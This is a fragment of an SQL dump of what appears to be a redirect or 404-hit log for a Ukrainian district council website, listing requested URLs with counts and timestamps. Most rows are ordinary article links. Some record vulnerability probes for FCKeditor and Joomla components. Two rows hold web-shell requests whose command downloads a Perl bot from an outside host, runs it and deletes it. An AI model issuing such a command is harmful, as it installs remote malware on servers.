00:00:00',301),(10367,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11&lang=uk&Itemid=','','','',3,0,'2014-11-06 19:12:54','0000-00-00 00:00:00',301),(10368,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1173:2014-01-15-10-37-18&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-06 19:13:03','0000-00-00 00:00:00',301),(10369,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1173:2014-01-15-10-37-18&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-06 19:13:18','0000-00-00 00:00:00',301),(10370,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:-27-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-06 19:13:21','0000-00-00 00:00:00',301),(10371,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:-27-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-06 19:13:23','0000-00-00 00:00:00',301),(10372,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-06 19:13:25','0000-00-00 00:00:00',301),(10373,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11&lang=uk&Itemid=','','','',3,0,'2014-11-06 19:13:30','0000-00-00 00:00:00',301),(10374,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1179:2014-01-21-12-44-04&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-06 19:13:46','0000-00-00 00:00:00',301),(10375,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1208:2014-01-31-13-48-49&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-06 19:13:53','0000-00-00 00:00:00',301),(10376,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1208:2014-01-31-13-48-49&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-06 19:13:57','0000-00-00 00:00:00',301),(10377,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-11-06 19:18:23','0000-00-00 00:00:00',301),(10378,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=907:2013-01-21-08-54-59&catid=47:-21022013-&Itemid=86&lang=ru','','','',1,0,'2014-11-06 19:38:32','0000-00-00 00:00:00',301),(10379,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&catid=47:-21022013-&Itemid=86&lang=uk','','','',2,0,'2014-11-06 21:34:58','0000-00-00 00:00:00',301),(10380,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1114:---------------lr---&catid=36&Itemid=70&lang=uk','','','',10,0,'2014-11-06 21:46:23','0000-00-00 00:00:00',301),(10381,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&catid=47:-21022013-&Itemid=86&lang=ru','','','',2,0,'2014-11-06 21:51:46','0000-00-00 00:00:00',301),(10382,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&catid=47:--21022013-&Itemid=86&lang=uk','','','',2,0,'2014-11-06 22:14:53','0000-00-00 00:00:00',301),(10383,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-06 23:51:48','0000-00-00 00:00:00',301),(10384,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11&lang=ru','','','',2,0,'2014-11-06 23:52:07','0000-00-00 00:00:00',301),(10385,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1033:2013-06-18-12-58-36&catid=51&Itemid=92&lang=en','','','',1,0,'2014-11-07 01:14:39','0000-00-00 00:00:00',301),(10386,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-07 01:14:50','0000-00-00 00:00:00',301),(10387,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-07 01:15:05','0000-00-00 00:00:00',301),(10388,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11&lang=en&Itemid=','','','',5,0,'2014-11-07 01:15:10','0000-00-00 00:00:00',301),(10389,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11&lang=en','','','',1,0,'2014-11-07 01:15:14','0000-00-00 00:00:00',301),(10390,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-07 01:15:16','0000-00-00 00:00:00',301),(10391,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11&lang=ru','','','',1,0,'2014-11-07 01:15:28','0000-00-00 00:00:00',301),(10392,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-07 01:15:30','0000-00-00 00:00:00',301),(10393,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-07 01:15:32','0000-00-00 00:00:00',301),(10394,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-07 01:15:37','0000-00-00 00:00:00',301),(10395,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11&lang=uk&Itemid=','','','',3,0,'2014-11-07 01:15:49','0000-00-00 00:00:00',301),(10396,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11&lang=ru&Itemid=','','','',3,0,'2014-11-07 01:15:58','0000-00-00 00:00:00',301),(10397,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11&lang=en&Itemid=','','','',3,0,'2014-11-07 01:16:06','0000-00-00 00:00:00',301),(10398,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11&lang=ru','','','',1,0,'2014-11-07 01:16:14','0000-00-00 00:00:00',301),(10399,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11&lang=en&Itemid=','','','',3,0,'2014-11-07 01:16:25','0000-00-00 00:00:00',301),(10400,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11&lang=en&Itemid=','','','',4,0,'2014-11-07 01:16:37','0000-00-00 00:00:00',301),(10401,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11&lang=en','','','',5,0,'2014-11-07 01:16:39','0000-00-00 00:00:00',301),(10402,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11&lang=en','','','',1,0,'2014-11-07 01:16:48','0000-00-00 00:00:00',301),(10403,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11&lang=ru','','','',2,0,'2014-11-07 01:19:49','0000-00-00 00:00:00',301),(10404,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11&lang=ru','','','',1,0,'2014-11-07 01:19:51','0000-00-00 00:00:00',301),(10405,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-11-07 01:51:11','0000-00-00 00:00:00',301),(10406,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1151:2013-11-28-14-54-33&catid=54:--29112013-&Itemid=95&lang=en','','','',5,0,'2014-11-07 02:05:51','0000-00-00 00:00:00',301),(10407,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1333:2014-06-05-13-09-03&catid=11&lang=uk','','','',2,0,'2014-11-07 03:41:53','0000-00-00 00:00:00',301),(10408,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-11-07 03:57:24','0000-00-00 00:00:00',301),(10409,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&catid=11&lang=en&Itemid=','','','',4,0,'2014-11-07 05:58:35','0000-00-00 00:00:00',301),(10410,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-07 06:06:21','0000-00-00 00:00:00',301),(10411,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&catid=15&lang=uk&Itemid=0','','','',3,0,'2014-11-07 06:42:27','0000-00-00 00:00:00',301),(10412,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1362:-2015-&catid=60&Itemid=108&lang=uk','','','',1,0,'2014-11-07 09:01:50','0000-00-00 00:00:00',301),(10413,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1364:-2012-2015-&catid=60&Itemid=108&lang=uk','','','',1,0,'2014-11-07 09:01:53','0000-00-00 00:00:00',301),(10414,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1366:-2014-&catid=60&Itemid=108&lang=uk','','','',1,0,'2014-11-07 09:01:58','0000-00-00 00:00:00',301),(10415,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1017:-2013-&catid=11&lang=en&Itemid=','','','',2,0,'2014-11-07 09:11:34','0000-00-00 00:00:00',301),(10416,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-lr-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',1,0,'2014-11-07 09:11:48','0000-00-00 00:00:00',301),(10417,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-lr-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-11-07 09:11:50','0000-00-00 00:00:00',301),(10418,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1048:2013-07-10-05-53-06&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2014-11-07 09:12:28','0000-00-00 00:00:00',301),(10419,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1048:2013-07-10-05-53-06&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',3,0,'2014-11-07 09:12:30','0000-00-00 00:00:00',301),(10420,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-07 09:12:52','0000-00-00 00:00:00',301),(10421,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11&lang=en&Itemid=','','','',3,0,'2014-11-07 09:14:24','0000-00-00 00:00:00',301),(10422,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-07 09:14:38','0000-00-00 00:00:00',301),(10423,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-07 09:14:53','0000-00-00 00:00:00',301),(10424,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-07 09:14:55','0000-00-00 00:00:00',301),(10425,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-07 09:15:13','0000-00-00 00:00:00',301),(10426,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-07 09:15:18','0000-00-00 00:00:00',301),(10427,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-07 09:15:20','0000-00-00 00:00:00',301),(10428,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11&lang=ru&Itemid=0','','','',9,0,'2014-11-07 09:15:25','0000-00-00 00:00:00',301),(10429,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-07 09:15:28','0000-00-00 00:00:00',301),(10430,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=3&Itemid=0&lang=en','','','',5,0,'2014-11-07 10:07:52','0000-00-00 00:00:00',301),(10431,'http://www.malyn-rayrada.org.ua/new/index.php','','','',2,0,'2014-11-07 10:11:00','0000-00-00 00:00:00',301),(10432,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11&lang=ru','','','',1,0,'2014-11-07 12:01:49','0000-00-00 00:00:00',301),(10433,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-07 12:02:00','0000-00-00 00:00:00',301),(10434,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-07 12:02:02','0000-00-00 00:00:00',301),(10435,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11&lang=ru','','','',1,0,'2014-11-07 12:02:05','0000-00-00 00:00:00',301),(10436,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11&lang=ru','','','',1,0,'2014-11-07 12:02:17','0000-00-00 00:00:00',301),(10437,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-07 12:02:21','0000-00-00 00:00:00',301),(10438,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-07 12:02:24','0000-00-00 00:00:00',301),(10439,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-07 12:02:31','0000-00-00 00:00:00',301),(10440,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-07 12:02:37','0000-00-00 00:00:00',301),(10441,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-07 12:02:40','0000-00-00 00:00:00',301),(10442,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11&lang=ru','','','',3,0,'2014-11-07 12:02:45','0000-00-00 00:00:00',301),(10443,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11&lang=ru&Itemid=','','','',2,0,'2014-11-07 12:02:48','0000-00-00 00:00:00',301),(10444,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11&lang=uk&Itemid=','','','',3,0,'2014-11-07 12:02:50','0000-00-00 00:00:00',301),(10445,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11&lang=uk&Itemid=','','','',3,0,'2014-11-07 12:02:55','0000-00-00 00:00:00',301),(10446,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11&lang=ru','','','',3,0,'2014-11-07 12:02:57','0000-00-00 00:00:00',301),(10447,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11&lang=ru&Itemid=','','','',2,0,'2014-11-07 12:03:00','0000-00-00 00:00:00',301),(10448,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1173:2014-01-15-10-37-18&catid=11&lang=uk','','','',1,0,'2014-11-07 12:03:07','0000-00-00 00:00:00',301),(10449,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11&lang=en&Itemid=0','','','',2,0,'2014-11-07 13:58:31','0000-00-00 00:00:00',301),(10450,'http://www.malyn-rayrada.org.ua/Fckeditor/editor/filemanager/browser/default/connectors/test.html','','','',5,0,'2014-11-07 16:23:19','0000-00-00 00:00:00',301),(10451,'http://www.malyn-rayrada.org.ua/Fckeditor/editor/filemanager/connectors/test.html','','','',4,0,'2014-11-07 16:23:25','0000-00-00 00:00:00',301),(10452,'http://www.malyn-rayrada.org.ua/admin/fckeditor/editor/filemanager/browser/default/connectors/test.html','','','',3,0,'2014-11-07 16:23:30','0000-00-00 00:00:00',301),(10453,'http://www.malyn-rayrada.org.ua/admin/fckeditor/editor/filemanager/connectors/test.html','','','',2,0,'2014-11-07 16:23:34','0000-00-00 00:00:00',301),(10454,'http://www.malyn-rayrada.org.ua/editor/editor/filemanager/browser/default/connectors/test.html','','','',3,0,'2014-11-07 16:23:38','0000-00-00 00:00:00',301),(10455,'http://www.malyn-rayrada.org.ua/editor/editor/filemanager/connectors/test.html','','','',2,0,'2014-11-07 16:23:44','0000-00-00 00:00:00',301),(10456,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=844:-2013-&catid=46:--21122012&Itemid=85&lang=ru','','','',1,0,'2014-11-07 17:15:10','0000-00-00 00:00:00',301),(10457,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1151:2013-11-28-14-54-33&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',5,0,'2014-11-07 17:18:25','0000-00-00 00:00:00',301),(10458,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=840:-2007-2015-&catid=46:--21122012&Itemid=85&lang=en','','','',1,0,'2014-11-07 18:42:32','0000-00-00 00:00:00',301),(10459,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-07 18:43:11','0000-00-00 00:00:00',301),(10460,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-11-07 18:43:14','0000-00-00 00:00:00',301),(10461,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-07 18:43:19','0000-00-00 00:00:00',301),(10462,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11&lang=en','','','',1,0,'2014-11-07 18:43:59','0000-00-00 00:00:00',301),(10463,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11&lang=en&Itemid=0','','','',3,0,'2014-11-07 18:44:04','0000-00-00 00:00:00',301),(10464,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-07 18:44:11','0000-00-00 00:00:00',301),(10465,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11&lang=en&Itemid=','','','',4,0,'2014-11-07 18:44:33','0000-00-00 00:00:00',301),(10466,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11&lang=en&Itemid=0','','','',2,0,'2014-11-07 18:44:35','0000-00-00 00:00:00',301),(10467,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-07 18:44:44','0000-00-00 00:00:00',301),(10468,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1021:-l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',1,0,'2014-11-07 18:45:26','0000-00-00 00:00:00',301),(10469,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11&lang=en','','','',1,0,'2014-11-07 18:45:43','0000-00-00 00:00:00',301),(10470,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11&lang=ru','','','',3,0,'2014-11-07 18:45:49','0000-00-00 00:00:00',301),(10471,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-11-07 18:45:52','0000-00-00 00:00:00',301),(10472,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-07 18:45:57','0000-00-00 00:00:00',301),(10473,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11&lang=en','','','',1,0,'2014-11-07 18:46:01','0000-00-00 00:00:00',301),(10474,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11&lang=ru&Itemid=','','','',3,0,'2014-11-07 18:46:54','0000-00-00 00:00:00',301),(10475,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-07 18:47:18','0000-00-00 00:00:00',301),(10476,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11&lang=uk','','','',4,0,'2014-11-07 18:47:38','0000-00-00 00:00:00',301),(10477,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-07 18:47:41','0000-00-00 00:00:00',301),(10478,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1211:-2014-&catid=56&Itemid=97&lang=en','','','',1,0,'2014-11-07 18:47:48','0000-00-00 00:00:00',301),(10479,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11&lang=uk&Itemid=','','','',2,0,'2014-11-07 18:47:59','0000-00-00 00:00:00',301),(10480,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',21,0,'2014-11-07 18:48:19','0000-00-00 00:00:00',301),(10481,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',13,0,'2014-11-07 18:48:23','0000-00-00 00:00:00',301),(10482,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-11-07 18:48:31','0000-00-00 00:00:00',301),(10483,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-07 18:48:38','0000-00-00 00:00:00',301),(10484,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-07 18:49:02','0000-00-00 00:00:00',301),(10485,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11&lang=ru&Itemid=','','','',4,0,'2014-11-07 18:49:14','0000-00-00 00:00:00',301),(10486,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11&lang=ru','','','',4,0,'2014-11-07 18:49:27','0000-00-00 00:00:00',301),(10487,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11&lang=uk&Itemid=','','','',3,0,'2014-11-07 18:49:33','0000-00-00 00:00:00',301),(10488,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11&lang=en','','','',2,0,'2014-11-07 18:49:50','0000-00-00 00:00:00',301),(10489,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-11-07 19:31:52','0000-00-00 00:00:00',301),(10490,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-07 21:22:17','0000-00-00 00:00:00',301),(10491,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-11-07 21:34:16','0000-00-00 00:00:00',301),(10492,'http://www.malyn-rayrada.org.ua/images/stories/petx.php?baca?cmd=cd /tmp ;wget http://khanza.ucoz.org/bot.log ; perl bot.log ; rm -rf bot.log*','','','',1,0,'2014-11-07 21:36:19','0000-00-00 00:00:00',301),(10493,'http://www.malyn-rayrada.org.ua/images/stories/explore.php?baca?cmd=cd /tmp ;wget http://khanza.ucoz.org/bot.log ; perl bot.log ; rm -rf bot.log*','','','',1,0,'2014-11-07 21:36:26','0000-00-00 00:00:00',301),(10494,'http://malyn-rayrada.org.ua/v2/components/com_community/index.html','','','',1,0,'2014-11-07 22:17:19','0000-00-00 00:00:00',301),(10495,'http://malyn-rayrada.org.ua/v2/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-07 22:17:25','0000-00-00 00:00:00',301),(10496,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=4&Itemid=8&lang=ru','','','',6,0,'2014-11-07 22:46:14','0000-00-00 00:00:00',301),(10497,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=5','','','',1,0,'2014-11-07 22:57:12','0000-00-00 00:00:00',301),(10498,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=5&I','','','',1,0,'2014-11-07 22:57:15','0000-00-00 00:00:00',301),(10499,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11&lang=ru&Itemid=','','','',2,0,'2014-11-07 23:29:46','0000-00-00 00:00:00',301),(10500,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11&lang=ru','','','',5,0,'2014-11-07 23:30:05','0000-00-00 00:00:00',301),(10501,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=933:-2013-2017-&catid=47&Itemid=86&lang=uk','','','',5,0,'2014-11-07 23:31:26','0000-00-00 00:00:00',301),(10502,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-11-07 23:47:10','0000-00-00 00:00:00',301),(10503,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11&lang=en','','','',3,0,'2014-11-08 00:26:38','0000-00-00 00:00:00',301),(10504,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11&lang=en&Itemid=0','','','',4,0,'2014-11-08 07:08:42','0000-00-00 00:00:00',301),(10505,'http://malyn-rayrada.org.ua/cgi/components/com_community/index.html','','','',1,0,'2014-11-08 07:16:29','0000-00-00 00:00:00',301),(10506,'http://malyn-rayrada.org.ua/cgi/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-08 07:16:35','0000-00-00 00:00:00',301),(10507,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&catid=15&lang=uk&Itemid=0','','','',4,0,'2014-11-08 07:23:53','0000-00-00 00:00:00',301),(10508,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=5&Itemid=&lang=en','','','',1,0,'2014-11-08 09:17:54','0000-00-00 00:00:00',301),(10509,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=5&Itemid=&lang=ru','','','',1,0,'2014-11-08 09:17:56','0000-00-00 00:00:00',301),(10510,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=5&Itemid=&lang=uk','','','',1,0,'2014-11-08 09:17:59','0000-00-00 00:00:00',301),(10511,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-08 09:29:43','0000-00-00 00:00:00',301),(10512,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-08 09:29:50','0000-00-00 